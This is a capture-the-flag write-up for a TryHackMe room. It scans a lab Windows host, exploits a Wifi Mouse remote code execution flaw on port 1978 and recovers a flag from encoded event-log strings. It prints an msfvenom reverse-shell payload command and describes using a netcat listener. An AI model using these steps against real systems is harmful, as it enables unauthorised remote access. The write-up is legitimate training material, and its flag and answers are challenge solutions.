# Micky Mouse Writeup Room name: **Micky Mouse** Room link: [**https://tryhackme.com/jr/yctfweekly**](https://tryhackme.com/jr/yctfweekly) Description: **``When did Micky Mouse completed it's half-century? Micky mouse event was the best event in the world 😁Can you find the flag of YCTF `event?``** Hint 1: **Have you tried nmap -Pn** (Direct/straight hint) Hint 2: **Micky's 50 Mouse year might help! It's the way to get inside!** (A small google search gave us **1978** as a Micky's 50)

### Let's begin with the exploitation! First we try to ping the machine, but no response, as the ICMP packets are blocked.

**So, Let's scan the target using rustscan** ``` ┌──(root㉿kali)-[~] └─# rustscan -a 10.10.145.192 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.145.192:1978 Open 10.10.145.192:3389 ``` We can see above, that the port **1978** and **3389** are open. But using nmap, we got the output as host is down ``` ┌──(root㉿kali)-[~] └─# nmap 10.10.145.192 -vv 130 ⨯ Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST Initiating Ping Scan at 09:16 Scanning 10.10.145.192 [4 ports] Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts) Nmap scan report for 10.10.145.192 [host down, received no-response] Read data files from: /usr/bin/../share/nmap Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds Raw packets sent: 8 (304B) | Rcvd: 0 (0B) ``` To bypass this issue, we can try this -Pn, We get the response as host is up and port scan begins! So, we used **Nmap flags -Pn (No ping scan) -O (OS detection) -sV (Service version detection)**, to scan only port 1978 and 3389. ``` ┌──(root㉿kali)-[~] └─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST Nmap scan report for 10.10.145.192 Host is up (0.16s latency). PORT STATE SERVICE VERSION 1978/tcp open unisql? 3389/tcp open ms-wbt-server? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1 SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2 SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r( SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2 SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n") SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1 Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%) No exact OS matches for host (test conditions non-ideal). OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds ``` We found out the service and OS running on the target. Then, simple search for the **port 1978 unisql** leads to this first exploit **Wifi Mouse 1.7.8.5** - **Remote Code Execution.**

Download the exploit Before running it, create a **MSF payload** by specifying LHOST and LPORT ``` ┌──(root㉿kali)-[/] └─# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1234 -f exe > thmouse.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes ``` **Now in one tab, run the python http server**

**In the second tab, listen using netcat**

**In the third tab, run the exploit!!** ``` python3 mouse.py ```

Holaa!! You got the **shell!**

Now, read the description and Question again! what does it say? It says, **Can you find the flag of YCTF \`event?** It was the biggest hint, the word **EVENT** was repeated in the description and in the question.

Now it makes sense to look into the **Windows events** **Using the command** `wevtutil qe Application` we can list all the Application events on windows.

Now scrolling just little down, we get the **fake flag**.

***So, I copied the whole log file into my machine and searched for the Base64 strings manually. By searching for the string `==` we got one string*** `ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==`

Using cyberchef to decode the base64 string, we get another hint which says, ***did you check event id 69 huh?***

So I Tried looking for the event **id 69**

Now, If you look closely in the 69th event, we can see some strange string `594354467b5230306d5f667531315f30665f6d307535337d0a` which then uploading to [Cyberchef](https://gchq.github.io/CyberChef/) and using Hex decode, gives us the actual flag! **Flag:** `YCTF{R00m_fu11_0f_m0u53}`

Challenge Credits: [Munazir ](https://linkedin.com/in/Munazirul) Hope you enjoyed the machine and learned new things from the challenge! 🌟📚